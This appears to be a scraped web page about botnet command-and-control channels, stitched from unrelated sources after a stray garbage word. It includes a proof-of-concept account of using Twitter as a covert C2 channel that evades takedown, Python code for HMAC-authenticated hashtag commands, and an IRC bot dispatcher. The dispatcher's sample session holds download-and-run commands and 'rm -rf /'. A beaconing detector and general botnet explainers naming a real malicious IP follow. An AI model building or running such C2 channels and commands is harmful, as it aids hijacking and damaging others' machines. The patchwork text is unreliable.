blinretirise

Twitter Being Used As Botnet Command Channel



KreiosC2 is a proof-of-concept bot which uses various unusual systems as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones; for example, you can set up a bot at home to listen to your Twitter feed and perform actions on it. I'll discuss the potentially malicious use of it here, but it would be easy to take the concepts and use them for good.








In this release I've separated the code which downloads the messages from the main body of the application, in the same way as the languages are self-contained files. This allowed me to add new command channels as well as the original Twitter.


My first idea was to have a protected Twitter account which only the bots could read. This would restrict who could see the commands, but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would mean that it would be harder for Twitter to block the messages, as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as "check out this link ..." to, say, download a file, which would be hard for Twitter to block without upsetting legitimate users, but I don't know how hard it would be to create a command language based on this.


I proposed these ideas to Tom Eston (from the Security Justice Podcast), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots.


Hopefully this gives you an idea of the potential for using channels other than IRC to control a bot or botnet. Versions 1 and 2 both suffer from the problem that once someone reverse engineers a bot and works out the command syntax, it would probably be possible for Twitter to shut the system down fairly well. However, as version 3 now allows you to switch channels, it makes the job of shutting down the network much harder, and if the reverse engineering job was made hard enough and the methods of hiding the commands were made either very generic or simply very numerous, maybe 50 different ways to say execute a command, then it would take admins a while to work out the fix and implement it, which may just give the bad guys the edge they need.
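As an added illustration of the search-and-match idea described above (example code written for this page, not KreiosC2's own code): the bot scans search results for an innocent-looking hashtag convention plus a short HMAC tag computed with a secret compiled into the bot, so look-alike tweets posted by anyone else are ignored; the platform, lacking that key, can only match the visible pattern, which also flags legitimate tweets, and once a reverse engineer recovers the key the same matcher gives exact detection, which is the symmetry the text warns about. The hashtag-to-action mapping, the key and the tweets are all constructed for this example.

```python
import hashlib
import hmac
import re

# Hypothetical hashtag-to-action mapping: innocent-looking tags stand for commands.
ACTIONS = {"#mustread": "download", "#lol": "execute", "#bbc": "sleep"}

# Hypothetical shared secret compiled into every bot; this is what a reverse
# engineer recovers from a captured sample.
BOT_KEY = b"kreios-demo-key"

URL_RE = re.compile(r"https?://\S+")
TAG_RE = re.compile(r"#(\w+)")
HEX6_RE = re.compile(r"#[0-9a-f]{6}\b")


def auth_tag(key: bytes, action: str, arg: str) -> str:
    """Six hex chars of HMAC-SHA256 over action|arg, posted as a trailing hashtag.
    A look-alike tweet written without the key cannot produce it."""
    msg = f"{action}|{arg}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]


def compose(key: bytes, action: str, arg: str, cover: str) -> str:
    """Botmaster side: wrap a command in text that reads like an ordinary tweet."""
    tag = next(t for t, a in ACTIONS.items() if a == action)
    parts = [cover, arg, tag, "#" + auth_tag(key, action, arg)]
    return " ".join(p for p in parts if p)


def parse_command(key: bytes, text: str):
    """Bot side: (action, arg) if the tweet carries an authentic command, else None."""
    hashtags = ["#" + h for h in TAG_RE.findall(text)]
    action = next((ACTIONS[h] for h in hashtags if h in ACTIONS), None)
    if action is None:
        return None
    url = URL_RE.search(text)
    arg = url.group(0) if url else ""
    expected = auth_tag(key, action, arg).encode()
    # constant-time compare against every non-action hashtag in the tweet
    for h in hashtags:
        if h not in ACTIONS and hmac.compare_digest(h[1:].encode(), expected):
            return action, arg
    return None


def find_commands(key: bytes, tweets):
    """Bot: scan search results (id, text) and keep only authentic commands."""
    found = []
    for tid, text in tweets:
        cmd = parse_command(key, text)
        if cmd is not None:
            found.append((tid, cmd[0], cmd[1]))
    return found


def detect_by_pattern(tweets):
    """Platform side without the key: flag any tweet carrying an action hashtag
    plus a six-hex-char hashtag. Catches the real commands and look-alikes alike."""
    flagged = []
    for tid, text in tweets:
        tags = ["#" + h for h in TAG_RE.findall(text)]
        if any(t in ACTIONS for t in tags) and HEX6_RE.search(text):
            flagged.append(tid)
    return flagged


# Constructed search results for this example: (tweet id, text).
SAMPLE_TWEETS = [
    (1, "morning everyone, coffee time #bbc"),  # benign use of an action tag
    (2, compose(BOT_KEY, "download", "http://example.test/report.pdf", "check out this link")),
    (3, "check out this link http://example.test/cats.jpg #mustread #ff00aa"),  # look-alike, bad tag
    (4, compose(BOT_KEY, "sleep", "", "bored today")),
    (5, "no hashtags here http://example.test/blog"),
]

if __name__ == "__main__":
    print("bot acts on:", find_commands(BOT_KEY, SAMPLE_TWEETS))
    print("platform flags (no key):", detect_by_pattern(SAMPLE_TWEETS))
    print("platform flags (key recovered):", [t for t, _, _ in find_commands(BOT_KEY, SAMPLE_TWEETS)])
```

The bot acts only on tweets 2 and 4; the keyless pattern matcher also flags tweet 3, so blocking on the pattern alone would hit ordinary users of those hashtags, while a recovered key removes the false positive entirely, which is why switching channels or rotating the syntax after a sample is analysed matters more than the cover text.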


Botnets are one of the most significant threats to today's Internet users. The combination of malware capable of exploiting network services and the growing number of daily transactions performed in the cloud makes those users an attractive target for cybercriminals, who have evolved their old IRC-based communication channels into decentralised P2P networks, HTTP/S botnets and even Twitter-controlled networks. Against this background, this article analyses the threat that will affect computer networks in the coming years by going through the different Command & Control channels botmasters use to keep control of their hijacked networks.


Among the server check-ins, one stood out: o@ns6934944.ip-54-36-49.eu (54.36.49.151). This host is a known exploit source reported by Bad Packets; on two occasions the IP was reported as the source of exploit attempts used in Muhstik botnet activity. Muhstik, described in our last blog, shares tactics with TeamTNT, including targeting cloud infrastructure, using an IRC botnet and deploying the XMRig cryptominer.


Typically, a bot herder compromises a set of computer systems to build a botnet and then uses it to run various kinds of attacks: scams, brute-force attacks, malware distribution and so on. The bot-master directs the compromised machines through remote commands; once the bots are assembled, the herder uses the command protocol to steer their behaviour and achieve the ultimate objective.


While the purpose of all botnets is the same (use many computers remotely to launch a large-scale, hard-to-trace attack), different types of botnets approach this objective in different ways. Some of the most commonly used types include:


An Internet Relay Chat bot (IRC bot) is an application that automates tasks and interactions in an IRC channel, appearing to be a real user. IRC bots can be legitimate, but the same mechanism is often used to run botnets: each infected machine joins a channel and reads the herder's messages there as commands.


Some attackers prefer manually driven botnets over fully autonomous ones because of the finer control they provide. On the attacker's instruction these tools can launch an attack from any compromised machine, and some botnets also fetch updates to their malicious code from a remote repository. On the plus side for defenders, the human interaction they require makes them easier to detect and track.


A backdoor is any technique, on a computer, network or software program, by which a user bypasses the standard security controls to obtain high-level (typically root) access. Once inside, attackers can steal personal and financial information, run other software and control connected devices. Backdoor botnets use compromised machines to infect further devices and add them to the pool of bots the attacker commands.


These botnets are controlled by a bot-master for remote process execution. The bot software is typically installed on compromised devices by one of several remote code-execution methods. To avoid identification by investigators and law enforcement, the bot-master usually hides behind proxies, the Tor network and intermediate shells. To allow remote control, the bots are configured to authenticate the command-and-control stations using a password and keys, so that only the herder can issue commands.


Botnets can be used to spread malware through phishing emails. Phishing is a social-engineering attack commonly used to obtain user information such as login credentials and credit-card details: the attacker poses as a trusted entity and tricks the victim into opening an email, instant message or text. The recipient is duped into clicking a malicious link, resulting in malware installation, a system freeze, a ransomware infection or the exposure of sensitive information. Phishing campaigns sent through a botnet are hard to trace because the messages originate from many unrelated victim machines rather than a single sender.


Botnets are responsible for most Internet spam, including email spam, comment spam and form spam. Spam is frequently used to distribute malware and deliver phishing attempts, and some botnets are capable of sending tens of billions of spam messages per day. A typical example of botnet-driven spam is fraudulent online reviews, where a fraudster takes over user devices and posts reviews in bulk without ever using the service or product.


For example, the ZeuS botnet is primarily intended to steal account credentials for numerous e-commerce, banking and social-media sites. ZeuS, first seen in 2007, is considered one of the most notorious botnets in history. It was originally designed to harvest end users' banking information and spread via spam and phishing emails: the attacker distributed a Trojan horse through the botnet to infect further devices.


The most common way to draw a machine into a botnet is to lure the target. To reduce the risk, avoid opening attachments from untrusted or unknown sources. For professional correspondence it is preferable to password-protect PDFs so that they do not become a vehicle for a botnet infection.


Using strong passwords reduces the likelihood of a botnet taking over an account. Two-factor authentication (2FA) adds a second layer: even when botnet malware captures a password, the attacker cannot log in without the second factor, so a single stolen credential is not enough for surreptitious activity on the account.


A common infection vector used by botnet operators is scanning the Internet for vulnerable web applications to exploit, then dropping malware or a backdoor. The advantage of targeting servers rather than personal consumer devices is powerful hardware that is always online and has high bandwidth. Many servers also have no anti-virus solution in place.


Once the bot is in place, the infected server connects to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC channel, F5 researchers observed that the botnet had more than 2,500 victims at the time of writing, including production servers, and that number is for a single IRC channel.
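As an added example (written for this page, not code from F5 or from any botnet discussed here) of what the IRC control channel above and the password-authenticated command stations mentioned earlier look like at the protocol level: a minimal bot dispatcher walks the raw server lines, answers PINGs to stay connected, tracks who is in the channel, and accepts commands only from a nick that has first sent the bot password. The same lines are what a researcher who joins the channel sees, which is how victim counts and commands get observed. The server, nicks, channel, `!login`/`!dl`/`!exec` syntax and password are all invented for this example.

```python
# Constructed IRC server-to-client lines as a bot (or a researcher in the
# channel) would receive them. Nicks, channel, hosts and syntax are invented.
SAMPLE_SESSION = """\
:irc.example.test 001 bot-a1b2 :Welcome to the network
:bot-a1b2!~x@10.0.0.5 JOIN :#upd
:bot-c3d4!~x@10.0.0.9 JOIN :#upd
:bot-e5f6!~x@10.0.0.12 JOIN :#upd
PING :irc.example.test
:herder!~h@203.0.113.7 PRIVMSG #upd :!login s3cret
:herder!~h@203.0.113.7 PRIVMSG #upd :!dl http://example.test/x.sh /tmp/x
:friend!~f@198.51.100.20 PRIVMSG #upd :hello everyone
:friend!~f@198.51.100.20 PRIVMSG #upd :!exec rm -rf /
:herder!~h@203.0.113.7 PRIVMSG #upd :!exec sh /tmp/x
:bot-c3d4!~x@10.0.0.9 PART #upd
"""


def parse_line(line):
    """Split one IRC line into (sender nick or None, command, middle params, trailing).
    The trailing parameter is everything after the first ' :' and may contain spaces."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    middle, sep, trailing = line.partition(" :")
    parts = middle.split()
    nick = prefix.split("!", 1)[0] if prefix else None
    return nick, parts[0], parts[1:], (trailing if sep else None)


def run_dispatcher(session_text, channel, password):
    """Process server lines the way a bot's command dispatcher would.
    Returns (accepted commands, replies the bot would send, current channel members)."""
    commands, replies, members, authed = [], [], set(), set()
    for raw in session_text.splitlines():
        if not raw.strip():
            continue
        nick, cmd, args, trailing = parse_line(raw)
        if cmd == "PING":
            # keepalive: a bot that does not answer is dropped by the server
            replies.append(f"PONG :{trailing}")
        elif cmd == "JOIN" and (args[:1] == [channel] or trailing == channel):
            members.add(nick)
        elif cmd == "PART" and args[:1] == [channel]:
            members.discard(nick)
        elif cmd == "PRIVMSG" and args[:1] == [channel] and trailing and trailing.startswith("!"):
            parts = trailing[1:].split()
            if not parts:
                continue
            word, rest = parts[0], parts[1:]
            if word == "login":
                # plain-text channel password, the weak check many IRC bots rely on:
                # anyone who reads the channel, including a researcher, learns it
                if rest == [password]:
                    authed.add(nick)
            elif nick in authed:
                commands.append((word, rest))
    return commands, replies, sorted(members)


if __name__ == "__main__":
    cmds, replies, members = run_dispatcher(SAMPLE_SESSION, "#upd", "s3cret")
    print("accepted:", cmds)
    print("would send:", replies)
    print("in channel:", members)
```

Only the herder's `!dl` and `!exec` are accepted; `friend`'s `!exec` is dropped because that nick never logged in. Note that the password crosses the channel in clear, so a defender sitting in the channel (or sniffing an unencrypted IRC session) gets both the command syntax and the credential, which is the weakness of password-only bot authentication.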


A command-and-control server (C&C server) is a machine that issues directives to devices infected with rootkits or other types of malware, such as ransomware. C&C servers are used to build large networks of infected devices capable of carrying out distributed denial-of-service (DDoS) attacks, and of stealing, deleting or encrypting data as part of an extortion scheme.


After successfully compromising a device, the threat actor establishes communication between the infected host and the C&C server to send it instructions and enlist it into a malicious network. A network under a C&C server's control is called a botnet, and its nodes are sometimes referred to as zombies. Beaconing, a periodic check-in from the infected device to the C&C server, is also used to deliver instructions or additional payloads.
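As an added example (not from any of the sources excerpted on this page) of what the beaconing described above looks like from the defender's side: an infected host calls home on a fixed timer, so the gaps between successive connections from one source to one destination are nearly constant, while user-driven traffic is bursty. The detector below groups connection-log lines by source and destination and flags pairs whose inter-connection gaps have a low coefficient of variation. The log lines, addresses and thresholds are constructed and assumed for this example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection log for this example: "<ISO timestamp> <src> <dst>".
# 10.0.0.5 contacts 203.0.113.7 every ~60 s (a beacon); 10.0.0.9 browses in
# bursts; 10.0.0.12 connects only three times, too few to judge.
SAMPLE_LOG = """
2024-03-01T10:00:00 10.0.0.5 203.0.113.7
2024-03-01T10:00:03 10.0.0.9 198.51.100.20
2024-03-01T10:01:00 10.0.0.5 203.0.113.7
2024-03-01T10:01:45 10.0.0.9 198.51.100.20
2024-03-01T10:02:01 10.0.0.5 203.0.113.7
2024-03-01T10:02:02 10.0.0.9 198.51.100.20
2024-03-01T10:03:00 10.0.0.5 203.0.113.7
2024-03-01T10:03:59 10.0.0.5 203.0.113.7
2024-03-01T10:05:01 10.0.0.5 203.0.113.7
2024-03-01T10:06:00 10.0.0.5 203.0.113.7
2024-03-01T10:07:00 10.0.0.5 203.0.113.7
2024-03-01T10:09:00 10.0.0.12 192.0.2.44
2024-03-01T10:10:00 10.0.0.12 192.0.2.44
2024-03-01T10:11:00 10.0.0.9 198.51.100.20
2024-03-01T10:11:00 10.0.0.12 192.0.2.44
2024-03-01T10:11:02 10.0.0.9 198.51.100.20
2024-03-01T10:20:30 10.0.0.9 198.51.100.20
2024-03-01T10:20:31 10.0.0.9 198.51.100.20
2024-03-01T10:45:00 10.0.0.9 198.51.100.20
"""


def parse_log(text):
    """Group connection timestamps by (src, dst)."""
    conns = defaultdict(list)
    for line in text.strip().splitlines():
        ts, src, dst = line.split()
        conns[(src, dst)].append(datetime.fromisoformat(ts))
    return conns


def beacon_score(times):
    """Return (cv, mean gap in seconds) for a list of timestamps.
    cv is the coefficient of variation of the inter-connection gaps: close to 0
    for a fixed timer, large for human-driven traffic."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return float("inf"), 0.0
    m = mean(gaps)
    if m == 0:
        return float("inf"), 0.0
    return pstdev(gaps) / m, m


def find_beacons(log_text, min_connections=6, max_cv=0.2):
    """Flag (src, dst) pairs with enough connections and near-constant gaps.
    The thresholds are assumptions to tune against your own baseline: malware
    that adds random jitter to its sleep pushes the cv up, so a tight max_cv
    trades missed beacons for fewer false positives."""
    hits = []
    for (src, dst), times in parse_log(log_text).items():
        if len(times) < min_connections:
            continue
        cv, period = beacon_score(times)
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "period_s": round(period), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {hit['src']} -> {hit['dst']} every {hit['period_s']} s (cv={hit['cv']})")
```

On the constructed log only the 60-second caller is reported; the bursty browser fails the regularity test and the three-connection pair is skipped for lack of data. In practice the same check runs over proxy, firewall or DNS logs, and the period it reports is a useful pivot for hunting other hosts talking to the same destination.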

